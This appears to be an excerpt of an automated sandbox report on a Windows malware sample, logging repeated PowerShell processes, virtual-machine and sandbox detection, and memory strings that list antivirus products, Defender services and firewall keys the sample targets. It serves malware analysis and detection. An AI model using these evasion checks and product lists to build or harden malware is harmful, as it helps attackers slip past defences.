Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: CpSHySoEfzH.exe, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp	Binary or memory string: DIR_WATCH.DLL
Source: CpSHySoEfzH.exe, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp	Binary or memory string: SBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLL%02XEVERYONECURRENT_USER0X%08XSB:0X%08XG:%S_0X%08X_%C:%S_V1$G:%S_0X%08XOPENMSCOREE.DLLSOFTWARE\MICROSOFT\INTERNET EXPLORER\MAINSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONES\%U2500ISOLATIONPMILNOPROTECTEDMODEBANNERYESCHECK_ASSOCIATIONSSOFTWARE\MICROSOFT\INTERNET EXPLORER\MAINIEXPLORE.EXESOFTWARE\CLIENTS\STARTMENUINTERNETIE.HTTPPROGIDSOFTWARE\MICROSOFT\WINDOWS\SHELL\ASSOCIATIONS\URLASSOCIATIONS\HTTP\USERCHOICEIE.HTTPSSOFTWARE\MICROSOFT\WINDOWS\SHELL\ASSOCIATIONS\URLASSOCIATIONS\HTTPS\USERCHOICESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.HTM\USERCHOICESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.HTML\USERCHOICEIE.ASSOCFILE.HTMCHROME.EXEFIREFOX.EXEOPERA.EXESAFARI.EXE360BROWSER.EXEMAXTHON.EXESVCVERSIONSOFTWARE\MICROSOFT\INTERNET EXPLORERVERSIONCURRENTVERSIONSOFTWARE\MOZILLA\MOZILLA FIREFOXHTTP\SHELL\OPEN\COMMANDSTART PAGEAPPLICATIONS\IEXPLORE.EXE\SHELL\OPEN\COMMANDIEX(X86)%S\INTERNET EXPLORER\IEXPLORE.EXESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\%SFLAGSCOOKIE:MOZILLA\FIREFOX\PROFILESCOOKIES.SQLITEERP~DCEN7ZXY~CXE7:7DND~YCREYV{D-7```9DND~YCREYV{D9TXZX[[NSUPDXQC`VERK^ZZBY~CN7^YTPZREZXY~CXE~YP7:7VG^7ZXY~CXE7A%7$%:U~CGEXTZXYH@^YSX@HT[VDDC^SV@~YSX`DNDCRZKTXYCEX{DRC''&KDREA~TRDKS~D\|KRYBZAZ`VERAUXODNDCRZKTBEERYCTXYCEX{DRCKDREA~TRDKAZ`VERDXQC@VERKAZ`VER;7^YT90LIBRARYINDOTASKMGR.EXEPROCEXP.EXE\DESKTOPDOCUMENTS%S\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6.0._*%S\WINSXS\%S\COMCTL32.DLLK32GETMAPPEDFILENAMEWPSAPI.DLLGETMAPPEDFILENAMEWSYSTEMMANUFACTURERHARDWARE\DESCRIPTION\SYSTEM\BIOSVMWARSYSTEMBIOSVERSIONHARDWARE\DESCRIPTION\SYSTEMVBOXDRIVERSVBOXVIDEO.SYSVBOXGUEST.SYSVMHGFS.SYSPRL_BOOT.SYSJJ8J^QPEJJ8J@TYNQCSEBCMD.EXEPROCESSORNAMESTRINGHARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0DG_SSUDBUSAPPLE MOBILE DEVICESOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION%S\%SDEPLOYMENT.SECURITY.LEVEL=MEDIUM
Source: CpSHySoEfzH.exe, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: CpSHySoEfzH.exe, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp	Binary or memory string: API_LOG.DLL
Source: Documento--SII--33875.exe, 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp, explorer.exe, 00000003.00000002.519183490.0000000002A00000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.545447794.0000000003B70000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.546008227.00000000041D0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000002.539566697.0000000003B10000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp	Binary or memory string: ELEVATION:ADMINISTRATOR!NEW:\DEVICE\HARDDISK0\PARTITION\??\PHYSICALDRIVE0WINE_GET_VERSIONWINE_GET_UNIX_FILE_NAMEPRODUCTID76487-640-1457236-2383776487-337-8429955-2261476487-644-3177037-2351076497-640-6308873-2383555274-640-2673064-2395076487-640-8834005-2319576487-640-0716662-2353576487-644-8648466-2310600426-293-8170032-8514676487-341-5883812-2242076487-OEM-0027453-63796SANDBOXSAND BOXMALWAREMALTESTTEST USERTRANSPARENTENABLEDPOLICYSCOPEDEFAULTLEVELITEMDATADESCRIPTIONSYSTEM\CURRENTCONTROLSET\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\%SSTANDARDPROFILEENABLEFIREWALLPUBLICPROFILESTANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST%S::ENABLEDWUAUSERVWSCSVCBITSMPSSVCSHAREDACCESSAVCUF32.DLL.KASPERSKY.COM.DRWEB.COMSYMANTEC.COM.AVAST.COM.AVG.COM.PANDASECURITY.COM.NAI.COMTRENDMICRO.COM.AVIRA.COM.COMODO.COM.SOPHOS.COMKAVDUMPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORERHIDESCAHEALTHTASKBARNONOTIFICATIONRSTRUI.EXESOFTWARE\MICROSOFT\INTERNET EXPLORER\SETUP\%SDONOTALLOWIE1112.0DONOTALLOWIE12WINDEFENDMRTSTUB.EXEMRT.EXERAPPORTMGMTSERVICETRSEE\RAPORT\RAPPORTSETUP.EXEWINDOWS DEFENDER%PROGRAMW6432%%PROGRAMFILES%WINDOWS DEFENDER\MSASCUI.EXEMPCMDRUN.EXEMSMPENG.EXEMPSVC.DLLNISSRV.EXEMSSECES.EXEMSASCUI.EXEMSCMSMPSVCAVG_UIAVGWDAVGUI.EXEAVGIDSAGENT.EXEAVGWDSVC.EXEAVGDIAGEX.EXEAVGMFAPX.EXEAVGUPD.EXEAVGCFGEX.EXEAVGCSRVA.EXEAVIRAAVGNTANTIVIRSERVICEUPDATE.DLLUPDATERC.DLLUPDATE.EXEUPDRGUI.EXEAVWEBLOADER.EXEAVGNT.EXEAVGUARD.EXEAVSHADOW.EXEAVCENTER.EXEUSRREQ.EXEAVPAVP15.0.0AVP15.0.1KASPERY\AVP.EXEAVPUI.EXECCSVCHST.EXESAV INSTALL DIRECTORYSOFTWARE\SYMANTEC\SYMANTEC ENDPOINT PROTECTION\INSTALLEDAPPSNAVNISN360NAVW32.EXENORTON SECURITYSOFTWARE\SYMANTEC\INSTALLEDAPPSSYMANTECNORTONSYMERR.EXE.EXENIS.EXENAV.EXEN360.EXENS.EXE.EXNIS.EXENAV.EXEENDPOINT PROTECTIONNAVWNT.EXECLTLMH.EXEAVAST! ANTIVIRUSAVASTAVASTUI.EXESETUPAVASTUI.EXEAVASTEMUPDATE.EXEAVASTSVC.EXEASHUPD.EXEASHQUICK.EXESCHED.EXEINSTUP.EXEAVASTPROGRAM \PROGRAM FILES\AVT SOFARE\AV\AUI.EXEAVTSVC.EXEAVTMUPD.EXEASPD.EXEASUIK.EXESCHD.EXESETP\INTP.EXESETP\ABUGRPRT.EXE.EXEWRSA.EXEWRSVCZATRAY.EXEFORCEFIELD.EXEZONEALARMUPDATING.DLLFSHOSTER32.EXEFSHOSTERFSAUA.DLLPSUNMAIN.EXEPSUAMAINPSUNSCAN.DLLPSANUPGMGR.DLLPSUAMAIN.EXEPSANCU.EXESOFTWARE\PANDA SOFTWAREPAVJOBS.EXEAVENGINE.EXEUPGRADER.EXEAD-AWARE SERVICELAVASOFTADAWARESERVICE11ADAWARE.EXEADAWARESERVICE.EXEBULLGUARDBULLGUARD.EXE.MANIFESTBULLGUARDUPDATE.EXEBULLGUARD.EXEBULLGUARDSCANNER.EXEBULLGUARDBHVSCANNER.EXEBULLGUARDUPDATE2.EXEBGSCAN.EXEBGSCANENGINE.DLLRSMGRSVC.MANIFESTUPDATER.EXEBACKUP\RSD\RSSETUP\UPDATER.EXERSTRAY.EXERAVMOND.EXERSMGRSVC.EXERSMAIN.EXEINSTALLPATHSOFTWARE\RISING\RAVRSSCAN.DLLRSTRAY.DLLMBAMSERVICEMBAMGUI.EXEMBAMDOR.EXEMBAM.EXEMBAMSERVICE.EXEMBAMSCHEDULER.EXEPCTSGUI.EXEPCTSAUXS.EXEPCTSSVC.EXEISTRAYUPDATE.EXEUPDATEHLPR.DLLSBAMTRAYSBAMUI.EXESBAMTRAY.EXEDEFINITIONS\VCORE.DLLF-PROT ANTIVIRUS TRAY APPLICATIONUPDATER_CLIENT_MOD.DLLFPROTTRAY.EXEFPWIN.EXESOPHOS AUTOUPDATE MONITORDATA PATH

Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	File opened / queried: VBoxGuest
Source: C:\Windows\SysWOW64\explorer.exe	File opened / queried: C:\Windows\SysWOW64\drivers\prl_boot.sys
Source: C:\Windows\SysWOW64\explorer.exe	File opened / queried: C:\Windows\SysWOW64\drivers\vmhgfs.sys
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	File opened / queried: HGFS
Source: C:\Windows\SysWOW64\explorer.exe	File opened / queried: C:\Windows\SysWOW64\drivers\vboxguest.sys
Source: C:\Windows\SysWOW64\explorer.exe	File opened / queried: C:\Windows\SysWOW64\drivers\vboxvideo.sys
Source: C:\Windows\SysWOW64\explorer.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Window / User API: threadDelayed 742
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Window / User API: threadDelayed 765
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Window / User API: threadDelayed 749
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Window / User API: threadDelayed 742
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Window / User API: threadDelayed 704
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Window / User API: threadDelayed 697
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Window / User API: threadDelayed 689
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Window / User API: threadDelayed 671
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Window / User API: threadDelayed 658
